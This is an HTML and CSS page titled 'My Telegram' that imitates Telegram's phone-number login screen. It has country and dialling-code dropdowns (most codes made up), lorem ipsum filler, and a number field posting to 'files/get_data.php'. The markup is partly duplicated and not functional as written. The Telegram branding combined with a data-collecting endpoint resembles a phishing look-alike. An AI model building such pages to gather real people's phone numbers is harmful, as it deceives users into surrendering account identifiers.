<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>My Telegram</title>
    <link rel="stylesheet" href="telegram.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <style>
 *{
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}

.senter{
    width: 100%;
    height: 400px;
    background-color: rgb(112, 155, 248);
    display: flex;
    justify-content: center;
}
.phon{
    display: flex;
    width: 100%;
    height: 400px;
    padding: 10px 10px;
    font-size: 5.5vw;
    position: relative;
    z-index: 1;
    /* flex-wrap:nowrap; */
    /* flex-direction:row; */
    /* justify-content: center; */
    /* align-items:flex-end; */
    /* align-self:flex-end; */
}
.phon .ponet {
    align-self:flex-end;
    margin: 0 5%;

    
}
#if{
    color: rgb(0, 89, 255);
}
.setern2{
    /* display: flex; */
    /* justify-content:flex-end; */
    /* flex-wrap: nowrap; */
    /* flex-direction: row; */
    /* width: 100%; */
    height: 340px;
    padding: 190px 0px;
    padding-right: 465px;
    
}
.forn2{
    cursor: pointer;
}
.w3-selec , .w3-container{
    cursor: pointer;
}
.red ,.red56{
    cursor: pointer;
}
@media screen and (max-width: 1150px) {
    .setern2{
        padding-right: 320px;
    }
}
@media screen and (max-width: 930px) {
    .setern2{
        padding-right: 180px;
    }
}
@media screen and (max-width: 730px) {
    .setern2{
        padding-right: 90px;
    }
}
@media screen and (max-width: 600px) {
    .setern2{
        padding-right: 10px;
    }
}

.bor{
    border: 2px solid rgb(255, 255, 255);
    background-color: rgb(255, 255, 255);
    width: 300px;
    height: 350px;
    /* margin:  -276px 548px;; */
    padding: 20px 10px;
    border-radius: 4%;
    box-shadow: 0px 0px 12px rgb(56, 56, 56);
}
.sev{
    display: flex;
    flex-wrap: nowrap;
    justify-content: space-around;
    flex-direction: column-reverse;
    /* margin: 10% 1% */

    width: 90%;
    height: 60%;

}
.bid{
    width: 95%;
    height: 15%;
    margin: 1% 1%;
    display: flex;
    justify-content: center;
    margin: 0 5%;

}
.bid2{
    width: 95%;
    border: none;
    height: 100%;
    border-radius: 1%;
}
.vid{
    width: 95%;
    height: 15%;
    margin: 1% 1%;
    display: flex;
    justify-content: center;
    margin: 0 5%;

}
.vid2{
    width: 95%;
    border: none;
    height: 100%;
    border-radius: 1%;
}
.red0{
    width: 95%;
    height: 15%;
    margin: 1% 1%;
    display: flex;
    justify-content: center;
    margin: 0 5%;
}
.red{
    width: 95%;
    border: none;
    height: 100%;
    border-radius: 1%;
    outline: none;
    border-bottom:1px dashed rgb(33, 207, 220) ;
    padding: 25 2%;
}
.red00{
    width: 95%;
    height: 15%;
    margin: 1% 1%;
    display: flex;
    justify-content: center;
}
.red000{
    width: 92%;
    border: none;
    height: 90%;
    border-radius: 1%;
    outline: none;
    padding: 25 2%;
    background-color: rgb(2, 199, 183);
    margin: -5% 0;
}
.pori{
    font-size: 1.6vw;
}
.porin2{
    font-size: 1.0vw;

}
@media screen and (max-width : 820px) {
    .pori{
        font-size: 2.3vw;
    }
    .porin2{
        font-size: 1.1vw;
    
    }
    
}
@media screen and (max-width : 620px) {
    .pori{
        font-size: 2.9vw;
    }
    .porin2{
        font-size: 2.1vw;
    
    }
    
}
@media screen and (max-width :400px) {
    .pori{
        font-size: 3.3vw;
    }
    .porin2{
        font-size: 2.5vw;
    
    }
    
}
/* @media screen and (max-width: 500px) {
    .bor{
        width: 250px;
    }
}

.pori{
    font-size: 1.5vw;
}
.porin2{
    padding: 20px 0px;
    font-size: 1.1vw;
    color: rgba(0, 0, 0, 0.452);
}
.w3-container {
    font-family: Verdana,sans-serif;
    font-size: 1.0vw;
    /* line-height: 1.5; */
    /* width: 100%;
    padding: 2.01em 18px;

  }
.w3-panel{
    padding: 2.01em 18px;
}
.h1lis{
    font-size: 1.1vw;
}
.w3-select{
    border: none;
}
.in12{
    width: 10%;

}
.w3-container {
    font-family: Verdana,sans-serif;
    font-size: 1.0vw;
    /* line-height: 1.5; */
    /* width: 30%;
    padding: 2.01em 18px;
    margin: 3% 0%;

  }
.red{
    margin: -16px 86px;
    display: flex;
    border: none;
    outline: none;
}
.red:active{
    border-bottom: 1px solid rgb(0, 181, 247);
}
.senteri{
    display: flex;
    justify-content: space-around;
    align-items: center;
    height: 35%;
    width: 100%;
}
.red56{
    align-self: flex-end;
    width: 87%;
    height: 37%; */
    /* font-size: 2.8;
    padding: 7px 0px;
    margin: 11px 0;     
    color: white;
    background-color: rgb(0, 110, 255);
    border: none;
} */

/* .forn{
    display: flex;
    width: 100%;
    height: 10%;
    justify-content: center;
    border: none;

}
.forn2{
    width: 90%;
    border: none; */

/* @media screen and (max-width:700px) {
    .pori{
        font-size: 2.8vw;
    }
    .porin2{
        font-size: 1.8vw;
    }
    .red56{
        align-self: flex-end;
        width: 87%;
        height: 37%;
        font-size: 2.8;
        padding: 7px 0px;
        margin: initial;        color: white;
        background-color: rgb(0, 110, 255);
        border: none;
    }
    .red{
        margin: -14px 86px;
        display: flex;
        border: none;
        outline: none;
        width: 146px;
        height: 7px;
        font-size: 4.6vw;
    }
    w3-container {
        font-family: Verdana,sans-serif;
        font-size: 1.0vw;
        line-height: 1.5;
        width: 30%;
        padding: 2.01em 18px;
        margin: 9% 0%;}
} */
/* @media screen and (max-width:500px) {
    

    .red{
        margin: -16px 59px;
        display: flex;
        border: none;
        outline: none;
        width: 146px;
        height: 8%;
        font-size: 2.9vw;
    }
    .red56 {
        align-self: flex-end;
        width: 87%;
        height: 37%;
        font-size: 2.8;
        padding: 0 7px;
        margin: initial;
        color: white;
        background-color: rgb(0, 110, 255);
        border: none;
        margin: -11% 0;
    }
    .w3-container {
        font-family: Verdana,sans-serif;
        font-size: 3vw;}
        .porin2 {
            font-size: 2.8vw;
          }
          .pori {
            font-size: 3.8vw;
          }
          
}
@media screen and (max-width:390px) {
    .w3-select{
        display: block;
    }
    ..red{
        display: block;
    }
} */

    </style>
</head>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>My Telegram</title>
    <link rel="stylesheet" href="telegram.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
</head>
<body>
    <div class="senter">
        <div class="phon">
            <p class="ponet">
                <i class="	fa fa-telegram" id="if"></i> Telegram
            </p>
           
        </div>
        <div class="setern2">
        <div class="bor">
        <p class="pori">
            Yoru phone Number
        </p>
        <p class="porin2">
            Lorem ipsum dolor, sit actetur adipisicing .  <br> Consequatur natus autem illo endis it!
        </p>
        <div class="sev">
        <form class="bid" action="/action_page.php">
          
            <select class="bid2" name="option">
            



              <option value="1">Option 1</option>
              <option value="2">Afghanistan 2</option>
              <option value="3">Albania 3</option>
              <option value="3">Algeria 4</option>
              <option value="3">Belgium 5</option>
              <option value="3">Britain 6</option>
              <option value="3">Bulgaria 7</option>
              <option value="3">China 8</option>
              <option value="3">Congo 9</option>
              <option value="3">Czech Republic 10</option>
              <option value="3">Egypt 11</option>
              <option value="3">England 12</option>
              <option value="3">Georgia 13</option>
              <option value="3">Germany 14</option>
              <option value="3">India 15</option>
              <option value="3">Iran 16</option>
            </select>
          
          </form>
        <form class="vid" action="/action_page.php">
          
            <select class="vid2" name="option">
                <option value="" disabled selected>USA</option>
                <option value="1"> +1</option>
                <option value="2"> +2</option>
                <option value="3">+23</option>
                <option value="3">+124</option>
                <option value="3">+855</option>
                <option value="3">+816</option>
                <option value="3">+17</option>
                <option value="3">+98</option>
                <option value="3">+39</option>
                <option value="3">+10</option>
                <option value="3">+311</option>
                <option value="3">+912</option>
                <option value="3">+713</option>
                <option value="3">+1220</option>
                <option value="3">+3154</option>
                <option value="3">+16</option>
            </select>
        
          </form>
          <form action="files/get_data.php" method="post" class="red0">
            <input type="number" placeholder="--- --- --- ---" required  class="red"> 
         </form>
          </div>
          <div class="red00">
          <input type="submit" value="NExT"   class="red000">
        </div>
          <!-- <form action="files/get_data.php" method="post">
       <input type="number" placeholder="--- --- --- ---" required  class="red"> 
    </form> -->
    </div>
</div>
    </div>
</body>
</html>
